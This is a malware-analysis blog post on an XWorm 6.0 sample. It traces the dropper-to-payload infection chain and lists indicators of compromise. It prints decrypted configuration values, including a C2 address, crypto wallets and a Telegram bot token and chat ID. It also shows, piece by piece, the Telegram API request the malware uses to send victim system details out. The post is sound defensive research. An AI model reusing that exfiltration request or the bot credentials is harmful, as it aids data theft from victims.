XWorm Malware Analysis

XWorm Malware Analysis

July 29, 2025
Fuad Aliyev
Malware Analysis
Reverse Engineering
Worm

What's XWorm?

"Malware with wide range of capabilities ranging from RAT to ransomware." -malpedia

Background

I'll keep things simple as usual. I was browsing MalwareBazaar when a JavaScript file tagged as "XWorm" caught my eye. I downloaded it to analyze later (I had a competition, so there was no time to check for a week). This is the MalwareBazaar link for the file. It was first seen in the wild on "2025-07-23 16:04:23 UTC".

Note: All files are provided at the end of this page.

Infection Chain

1|700

None of these files were downloaded from external sources. Most of them were extracted using Base64 decoding and AES decryption.

Analysis: Dropper and Evasion Techniques

Extracting the files was straightforward for me. Instead of letting the code execute normally, I wrote the decoded bytes/scripts to files and analyzed them one by one.

Stage 1: JavaScript Dropper

Starting with the JavaScript file, it had only one purpose: extracting "DallasBoulevard.bat" into "AppData/Local/Temp" and executing it.

Stage 2: Batch File Operations

This batch file had several purposes and was obfuscated. I extracted its primary function: executing a PowerShell command. This PowerShell command uses the same batch file (in a different directory) to:

  1. Get the first line starting with ":::"
  2. Base64 decode it
  3. Execute it (another PowerShell command)

Stage 3: Advanced Evasion PowerShell

This PowerShell command uses advanced techniques to avoid detection:

1|900

Comments were added by me during analysis; strings were also encrypted, so I had to decrypt them.

Stage 4: Final Payload Extraction

After the PowerShell script finishes execution, it looks for "::" lines and separates them into two different executable files:

  1. First executable: A .NET file that is useless and does nothing
  2. Second executable: Decrypts bytes and executes "XWormClient.exe" (the main malware file)

This .NET executable is heavily obfuscated. I used NetReactorSlayer to deobfuscate it, but it couldn't accomplish much. I might have done something wrong, but I was able to extract the information I needed in the end.

XWormClient Analysis

Part 1: String Decryption

All decrypted strings from the malware:

Glass0.
obf_str1 = 192.159.99.85
obf_str2 = 6000
obf_str3 = <666666>
obf_str4 = \<Xwormmm\>
obf_str5 = XWorm V6.0
obf_str6 = USB.exe
string2 = bc1qac0j3zkpqwudsezg63x37nmqv2tanpk2zys43c
obf_str7 = 0x9e335947293636ADfC39A13825Cd04244Fd0c1a9
obf_str8 = TWNsPN7sYpTSogGAnixsTDJnnPCViDQ45r
obf_str9 = 7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE
obf_str10 = 440743435

Part 2: Persistence Setup

Creates a new mutex with the name: "6NW0cPlN6C2gZ2Tp"

Part 3: Main Loop

The application runs and sets itself in an infinite loop

Part 4: Network Configuration

Sets up network connection (DefaultConnectionLimit and other parameters are modified)

Part 5: C2 Communication

After the WebClient object is created, the malware gathers system information:

☠ [XWorm V6.0 @XCoderTools]

New Client : 
41B3E62F549A81F56A43

UserName : flare
OSFullName : Microsoft Windows 10 Pro
USB : False
CPU : 13th Gen Intel i7-13650HX
GPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter 
RAM : 7.98 GB
Group : XWorm V6.0

Note: This is my PC configuration (VM)

Telegram Bot C2 Communication

The malware constructs a Telegram bot API request with the following components:

[0] "https://api.telegram.org/bot"
[1] "7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE"
[2] "/sendMessage?chat_id="
[3] "440743435"
[4] "&text="
[5] [System information collected above]

The Telegram API returns:

{
  "ok": true,
  "result": {
    "message_id": 1132,
    "from": {
      "id": 7257315662,
      "is_bot": true,
      "first_name": "VIRUS 🦠 BOTS",
      "username": "Alvin0365bot"
    },
    "chat": {
      "id": 440743435,
      "first_name": "Alvinmullar",
      "username": "alvinmullar",
      "type": "private"
    },
    "date": 1753785840,
    "text": "☠ [XWorm V6.0 @XCoderTools]\n\nNew Client : \n41B3E62F549A81F56A43\n\nUserName : flare\nOSFullName : Microsoft Windows 10 Pro\nUSB : False\nCPU : 13th Gen Intel i7-13650HX\nGPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter \nRAM : 7.98 GB\nGroup : XWorm V6.0",
    "entities": [
      {
        "offset": 14,
        "length": 12,
        "type": "mention"
      }
    ]
  }
}

After sending the information, the WebClient is disposed.

Key Findings

The analysis reveals that:

  1. Telegram Bot C2: The malware uses a Telegram bot as its command and control infrastructure
  2. Secondary C2: The IP address 192.159.99.85:6000 is likely used for remote connections (though I didn't investigate this deeply)
  3. Version: This is XWorm version 6.0, which appears to be the latest version
  4. New Samples: All extracted files are new and have been uploaded to MalwareBazaar for further research

Indicators of Compromise (IOCs)

Network IOCs:

  • IP: 192.159.99.85:6000
  • Telegram Bot Token: 7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE
  • Chat ID: 440743435
  • Username: alvinmullar
  • Bot Username: Alvin0365bot

Cryptocurrency Addresses:

  • Bitcoin: bc1qac0j3zkpqwudsezg63x37nmqv2tanpk2zys43c
  • Ethereum: 0x9e335947293636ADfC39A13825Cd04244Fd0c1a9
  • Monero: TWNsPN7sYpTSogGAnixsTDJnnPCViDQ45r

File Hashes:

Mutex:

  • 6NW0cPlN6C2gZ2Tp